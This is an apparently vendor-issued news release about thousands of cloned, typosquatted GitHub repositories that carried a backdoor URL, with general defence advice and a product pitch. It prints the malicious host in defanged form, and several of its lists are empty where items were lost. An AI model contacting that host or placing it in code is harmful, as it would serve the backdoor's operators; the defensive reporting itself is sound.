08/08/2022 | News release | Distributed by Public on 08/08/2022 12:33
Recently, GitHub reported that more than 35,000 files in GitHub repositories had been found to include a malicious URL, namely:
hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru
Many of these files were included in cloned repositories - clones of popular projects - which were re-released under a similar name. This is a classic example of typosquatting, but on a massive scale that has not been seen previously on GitHub. A typical infected file might look like:
Cloned repositories altered with malware contain backdoor (source: BleepingComputer)
The threat here is twofold:
Typosquatting occurs when a bad actor:
Unfortunately, typosquatting has been proven to be incredibly effective, and is one of the most popular ways for bad actors to compromise organizations. Luckily, there are a number of best practices that can help mitigate the risk of importing typosquatted code.
We all make typing mistakes, which makes us all susceptible to typosquatting. But there are a number of solutions that organizations can put in place to help catch those mistakes before they result in the import of a malicious exploit:
Security-conscious organizations may want to implement more than one best practice, creating a defense in depth strategy that not only seeks to prevent typosquatted code from ever entering the organization, but also scanning for malware on a regular basis throughout the software development lifecycle in order to catch any that may have inadvertently slipped in.
Securing the software supply chain is a difficult and expensive task due to the breadth and depth of the open source supply chain that most software development organizations require. Each point in the chain offers multiple points of entry for malicious actors who will always look for the weakest link to exploit. This makes ensuring the integrity and security of publicly available code a complicated and costly problem for most organizations.
While no vendor currently provides a comprehensive, end-to-end supply chain solution, some like ActiveState have begun to offer a turnkey solutionfor use cases involving open source languages like Python, Perl, Tcl and Ruby. Such an out-of-the-box solution can save enterprises significant time, resources and money when compared to a multi-vendor approach.
Want to understand how the ActiveState Platform can secure your software supply chain? Contact Sales, or sign up for a free ActiveState Platform account and try it out yourself.
Experienced Product Marketer and Product Manager with a demonstrated history of success in the computer software industry. Strong skills in Product Lifecycle Management, Pragmatic Marketing methods, Enterprise Software, Software as a Service (SaaS), Agile Methodologies, Customer Relationship Management (CRM), and Go-to-market Strategy.